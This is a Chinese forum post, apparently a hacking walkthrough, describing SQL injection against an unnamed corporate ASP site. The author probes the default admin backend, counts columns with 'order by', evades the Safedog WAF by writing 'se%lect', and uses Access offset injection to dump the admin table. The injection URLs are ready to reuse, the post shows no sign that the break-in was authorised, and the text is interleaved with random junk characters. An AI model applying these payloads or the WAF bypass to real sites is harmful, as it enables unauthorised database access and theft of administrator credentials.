打开网站,一个企业站。' N8 ]& x) ^" g3 T1 V
' I- g! G' T8 f3 U3 l! Y# W p2 I/ H4 G8 q1 S3 I# x E8 o$ A
顺手加个admin
( p0 X* w3 C3 z* |& k
; N \* i: Z' n8 L
- _" d* W. P; [* t默认后台。
% C" L g" m% ?4 m+ I" e5 |回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。
) N) e( A& x2 O9 s
! j3 g! e$ q9 a+ Y7 h
! Z# E& V$ O, n7 l/ k* U
5 k( Q7 j5 g8 e3 G所以就不用御剑扫了,待会直接封IP。) j! Z# j9 q% [+ O
1 D4 X" ~9 j. o' n) P+ C用order by语句判断是否存在注入。5 m# z2 m4 |4 R% @& k, K
http://www.xxx.com /product_show.asp?id=997 order by 1- A1 ?( {, H* V! I Y& Q: ]
http://www.xxx.com /product_show.asp?id=997 order by 100$ R6 J; @- h' U' u3 \
现在存在注入,经测试后发现是9个字段。0 ^' F; Z2 Y" ^. I
0 d' `4 P1 n- g& i$ `. V接下来进行联合查询,猜是否存在admin表。
% P# B4 h$ }* nhttp://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。5 Q ?* I2 r( _7 [ ?# @, d
' t" @- q$ b+ R: m- U# H0 I9 r; f; h: F* E U w7 _5 N
+ i8 }) Z6 Q/ R; }# C在select中间加个%,se%lect绕过安全狗。# }0 i Q2 m5 c1 X6 ^/ ~0 i/ b+ }% ^
3 o. N0 n, `; |) A% M
# P( U+ x* ?/ r- T) p4 R/ P/ a发现存在admin表,然后开始手工猜常用的字段。
6 J5 A+ L. L7 U+ d* ~纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
: |/ j( e+ \2 _. x9 }/ W; G
& e+ q: K* l' W4 V$ X突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。8 T8 _: l. y5 n4 d7 |
0 y4 w3 G6 U! d9 L, }. I, _( Q
科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
: Z3 g( j1 K) P- chttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
/ {7 _7 B) Z2 i好了,敏感内容出显了。
7 r. s9 k3 i; O; {3 L0 G, s& i) f& _+ O C- [& ]4 e
! E' M: M* l" X( a5 w+ w% ]+ E3 n( L; s. n
|